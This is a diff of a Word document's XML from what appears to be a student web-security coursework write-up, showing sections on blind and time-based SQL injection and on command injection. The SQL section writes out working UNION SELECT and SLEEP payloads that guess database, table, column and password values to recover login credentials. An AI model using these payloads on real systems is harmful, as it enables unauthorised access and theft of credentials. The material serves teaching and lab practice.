+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'DATABASE_NAME' and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> like 'u%';--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">We repeat the same thing but for the table name this time. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Step 3:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>schema.COLUMNS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE TABLE_SCHEMA='DATABASE_NAME' and TABLE_NAME='users' and COLUMN_NAME like 'a%';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We keep guessing the column name. After getting all the column names, we can retrieve the data inside that column using:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>admin123' UNION SELECT 1,2,3 from users where username like 'a%</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0E101A"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">admin123' UNION SELECT 1,2,3 from users where </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> like '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0E101A"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>admin123' UNION SELECT 1,2,3 from users where username='admin' and password like '123%</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>With this technique, we can get to the username and the password then log in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">SQLi - TIME BASED </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">It has the same idea as the previous method. When the entered statement is true, the response should be delayed for some seconds. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve">admin123' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>SLEEP(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t>5),2;--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>If the data</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">base has 2 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>columns(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>TRUE STATEMENT) the response should be delayed 5 seconds.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Then we can proceed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=admin123' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>SLEEP(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>5),2 where database() like 'u%';--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
+          <w:color w:val="212529"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(WE CAN USE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>BurpSuite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="FFFFFF"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to save time)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6230,14 +8566,14 @@
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc113747832"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc114154867"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
         <w:t>Command Injection</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6289,7 +8625,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">We are presented with an input to enter any </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -6362,7 +8697,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29">
+                    <a:blip r:embed="rId44">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6487,7 +8822,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30">
+                    <a:blip r:embed="rId45">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6586,6 +8921,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">It should be too easy to tell the input to do more commands. For example, we can enter any </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -6667,7 +9003,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31">
+                    <a:blip r:embed="rId46">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6847,6 +9183,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09CE2909" wp14:editId="3278D0BE">
             <wp:extent cx="5725160" cy="5939790"/>
@@ -6865,7 +9202,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32">
+                    <a:blip r:embed="rId47">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7026,6 +9363,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Why? Looking at the code: </w:t>
       </w:r>
     </w:p>
@@ -7062,7 +9400,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33">
+                    <a:blip r:embed="rId48">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7189,7 +9527,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34">
+                    <a:blip r:embed="rId49">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7246,7 +9584,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId50" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7344,7 +9682,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36">
+                    <a:blip r:embed="rId51">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7447,7 +9785,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc113747833"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc114154868"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -7456,7 +9794,7 @@
         </w:rPr>
         <w:t>(BOK) Network Security (week 5-8)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7467,7 +9805,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc113747834"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc114154869"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -7476,64 +9814,16 @@
         </w:rPr>
         <w:t>(BOK) Security Concepts (week 9-10)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -7556,7 +9846,7 @@
           <w:lang w:val="en-AS"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc113747835"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc114154870"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
@@ -7565,7 +9855,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>References</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7670,7 +9960,7 @@
         </w:rPr>
         <w:t xml:space="preserve">(10), 94–100. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId37" w:history="1">
+      <w:hyperlink r:id="rId52" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7733,7 +10023,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Security Boulevard. Retrieved September 9, 2022, from </w:t>
       </w:r>
